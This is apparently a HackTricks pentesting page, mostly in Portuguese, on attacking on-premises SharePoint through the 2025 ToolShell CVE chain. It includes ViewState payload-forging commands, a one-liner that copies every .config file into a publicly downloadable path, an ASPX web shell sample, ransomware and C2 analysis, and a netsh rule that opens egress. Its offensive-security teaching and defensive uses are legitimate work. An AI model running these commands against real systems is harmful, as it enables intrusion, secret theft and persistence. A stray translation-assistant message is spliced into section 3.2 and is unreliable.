Microsoft SharePoint – Pentesting & Exploitation

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Microsoft SharePoint (on-premises) é construído sobre ASP.NET/IIS. A maior parte da superfície de ataque web clássica (ViewState, Web.Config, web shells, etc.) está, portanto, presente, mas o SharePoint também inclui centenas de páginas ASPX proprietárias e serviços web que ampliam dramaticamente a superfície de ataque exposta. Esta página reúne truques práticos para enumerar, explorar e persistir dentro de ambientes SharePoint com ênfase na cadeia de exploração de 2025 divulgada pela Unit42 (CVE-2025-49704/49706/53770/53771).

1. Enumeração rápida

# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI

# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# interesting standard paths
/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx                     # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx

# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. 2025 exploit chain (também conhecido como “ToolShell”)

2.1 CVE-2025-49704 – Injeção de Código em ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload> permite que código arbitrário Server-Side Include seja injetado na página, que é posteriormente compilado pelo ASP.NET. Um atacante pode embutir C# que executa Process.Start() e inserir um ViewState malicioso.

2.2 CVE-2025-49706 – Bypass de Autenticação Impróprio

A mesma página confia no header X-Forms_BaseUrl para determinar o contexto do site. Ao apontá-lo para /_layouts/15/, MFA/SSO aplicado no site raiz pode ser contornado sem autenticação.

2.3 CVE-2025-53770 – Desserialização de ViewState sem autenticação → RCE

Uma vez que o atacante controla um gadget em ToolPane.aspx, ele pode enviar um valor __VIEWSTATE não assinado (ou somente com MAC) que aciona a desserialização .NET dentro do w3wp.exe, levando à execução de código.

Se a assinatura estiver ativada, roube a ValidationKey/DecryptionKey de qualquer web.config (veja 2.4) e forje o payload com ysoserial.net ou ysodom:

ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

Para uma explicação detalhada sobre abuso do ASP.NET ViewState, leia:

Exploiting __VIEWSTATE without knowing the secrets

2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure

Enviar um parâmetro Source forjado para ToolPane.aspx (e.g. ../../../../web.config) retorna o arquivo alvo, permitindo leakage of:

  • <machineKey validationKey="…" decryptionKey="…"> ➜ forge ViewState / ASPXAUTH cookies
  • connection strings & secrets.

2.5 ToolShell workflow observed in Ink Dragon intrusions

Check Point mapeou como o Ink Dragon operacionalizou a cadeia ToolShell meses antes da Microsoft liberar correções:

  • Header spoofing for auth bypass – o ator envia POSTs para /_layouts/15/ToolPane.aspx com Referer: https://<victim>/_layouts/15/ mais um X-Forms_BaseUrl falso. Esses cabeçalhos convencem o SharePoint de que a requisição se origina de um layout confiável e pulam completamente a front-door authentication (CVE-2025-49706/CVE-2025-53771).
  • Serialized gadget in the same request – o body inclui dados ViewState/ToolPart controlados pelo atacante que chegam ao formatador vulnerável no servidor (CVE-2025-49704/CVE-2025-53770). A payload normalmente é uma cadeia ysoserial.net que roda dentro de w3wp.exe sem nunca tocar o disco.
  • Internet-scale scanning – telemetria de julho de 2025 mostra que eles enumeraram cada endpoint alcançável /_layouts/15/ToolPane.aspx e repetiram um dicionário de leaked <machineKey> pairs. Qualquer site que copiou um sample validationKey da documentação pode ser comprometido mesmo que esteja completamente patchado (veja a página ViewState para o signing workflow).
  • Immediate staging – a exploração bem-sucedida deposita um loader ou PowerShell stager que: (1) faz dump de cada web.config, (2) planta um ASPX webshell como acesso contingente, e (3) agenda um Potato privesc local para escapar do IIS worker.

3. Post-exploitation recipes observed in the wild

3.1 Exfiltrate every .config file (variation-1)

cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

O arquivo resultante debug_dev.js pode ser baixado anonimamente e contém toda a configuração sensível.

3.2 Implantar um Base64-encoded ASPX web shell (variation-2)

powershell.exe -EncodedCommand <base64>

Exemplo de payload decodificado (encurtado):

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
Response.Write(MachineKey.ValidationKey);
// echo secrets or invoke cmd
}
</script>

Você não forneceu o conteúdo do arquivo src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md. Por favor cole aqui o conteúdo que deseja traduzir (ou confirme que quer que eu abra/acesse um arquivo específico) e eu o traduzirei para português mantendo exatamente a mesma sintaxe markdown/html e preservando tags, links, paths e blocos de código conforme suas instruções.

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

The shell exposes endpoints to read / rotate machine keys which allows forging ViewState and ASPXAUTH cookies across the farm.

3.3 Obfuscated variant (variation-3)

Same shell but:

  • dropped under ...\15\TEMPLATE\LAYOUTS\
  • variable names reduced to single letters
  • Thread.Sleep(<ms>) added for sandbox-evasion & timing-based AV bypass.

3.4 AK47C2 multi-protocol backdoor & X2ANYLOCK ransomware (observed 2025-2026)

Recent incident-response investigations (Unit42 “Project AK47”) show how attackers leverage the ToolShell chain after initial RCE to deploy a dual-channel C2 implant and ransomware in SharePoint environments:

AK47C2 – dnsclient variant

  • Hard-coded DNS server: 10.7.66.10 communicating with authoritative domain update.updatemicfosoft.com.
  • Messages are JSON objects XOR-encrypted with the static key VHBD@H, hex-encoded and embedded as sub-domain labels.
{"cmd":"<COMMAND>","cmd_id":"<ID>"}
  • Long queries are chunked and prefixed with s, then re-assembled server-side.
  • Server replies in TXT records carrying the same XOR/hex scheme:
{"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
  • Version 202504 introduced a simplified format <COMMAND>::<SESSION_KEY> and chunk markers 1, 2, a.

AK47C2 – httpclient variant

  • Re-uses the exact JSON & XOR routine but sends the hex blob in the HTTP POST body via libcurl (CURLOPT_POSTFIELDS, etc.).
  • Same task/result workflow allowing:
  • Arbitrary shell command execution.
  • Dynamic sleep interval and kill-switch instructions.

X2ANYLOCK ransomware

  • 64-bit C++ payload loaded through DLL side-loading (see below).
  • Employs AES-CBC for file data + RSA-2048 to wrap the AES key, then appends the extension .x2anylock.
  • Recursively encrypts local drives and discovered SMB shares; skips system paths.
  • Drops clear-text note How to decrypt my data.txt embedding a static Tox ID for negotiations.
  • Contains an internal kill-switch:
if (file_mod_time >= "2026-06-06") exit(0);

DLL side-loading chain

  1. Attacker writes dllhijacked.dll/My7zdllhijacked.dll next to a legitimate 7z.exe.
  2. SharePoint-spawned w3wp.exe launches 7z.exe, which loads the malicious DLL because of Windows search order, invoking the ransomware entrypoint in memory.
  3. A separate LockBit loader observed (bbb.msiclink_x86.execlink_dll_x86.dll) decrypts shell-code and performs DLL hollowing into d3dl1.dll to run LockBit 3.0.

[!INFO] The same static Tox ID found in X2ANYLOCK appears in leaked LockBit databases, suggesting affiliate overlap.

3.5 Turning SharePoint loot into lateral movement

  • Decrypt every protected section – once seated on the web tier, abuse aspnet_regiis.exe -px "connectionStrings" C:\\temp\\conn.xml -pri (or -px "appSettings") to dump the clear-text secrets hiding behind <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">. Ink Dragon repeatedly harvested SQL logins, SMTP relays and custom service credentials this way.
  • Recycle app-pool accounts across farms – many enterprises reuse the same domain account for IIS APPPOOL\SharePoint on every front-end. After decrypting identity impersonate="..." blocks or reading ApplicationHost.config, test the credential over SMB/RDP/WinRM to every sibling server. In multiple incidents the account was also a local administrator, allowing psexec, sc create, or scheduled-task staging without triggering password sprays.
  • Abuse leaked <machineKey> values internally – even if the internet perimeter gets patched, reusing the same validationKey/decryptionKey allows lateral ViewState exploitation between internal SharePoint zones that trust each other.

3.6 Persistence patterns witnessed in 2025 intrusions

  • Scheduled tasks – a one-shot task named SYSCHECK (or other health-themed names) is created with /ru SYSTEM /sc once /st <hh:mm> to bootstrap the next-stage loader (commonly a renamed conhost.exe). Because it is run-once, telemetry often misses it unless historic task XML is preserved.
  • Masqueraded services – services such as WindowsTempUpdate, WaaSMaintainer, or MicrosoftTelemetryHost are installed via sc create pointing at the sideloading triad directory. The binaries keep their original AMD/Realtek/NVIDIA signatures but are renamed to match Windows components; comparing the on-disk name with the OriginalFileName PE field is a quick integrity check.

3.7 Host firewall downgrades for relay traffic

Ink Dragon routinely adds a permissive outbound rule that masquerades as Defender maintenance so ShadowPad/FinalDraft traffic can exit on any port:

netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any

Como a regra é criada localmente (não via GPO) e usa o binário legítimo Defender como program=, a maioria das SOC baselines a ignora, mas ela abre Any ➜ Any egress.

Truques relacionados

  • IIS post-exploitation & web.config abuse:

IIS - Internet Information Services

Referências

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks